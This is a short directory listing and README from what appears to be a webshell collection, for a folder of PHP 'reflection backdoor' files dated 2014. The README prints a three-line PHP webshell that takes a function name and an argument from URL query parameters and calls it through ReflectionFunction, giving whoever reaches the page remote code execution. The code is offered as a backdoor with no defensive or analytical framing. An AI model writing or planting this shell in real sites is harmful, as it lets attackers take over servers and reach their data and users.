webshell/php/p2j
2014-07-28 10:09:59 +08:00
..
11.jpg update php reflection webshell 2014-07-28 09:47:51 +08:00
PHP reflection.php.txt update php reflection webshell 2014-07-28 09:47:51 +08:00
PHP反射后门.php.txt updaet p2j php reflection php shell 2014-07-28 09:57:19 +08:00
Readme.md update readme.md 2014-07-28 10:09:59 +08:00

alt text

code:

<?php
    $func = new ReflectionFunction($_GET[m]);
    echo $func->invokeArgs(array($_GET[c]));
?>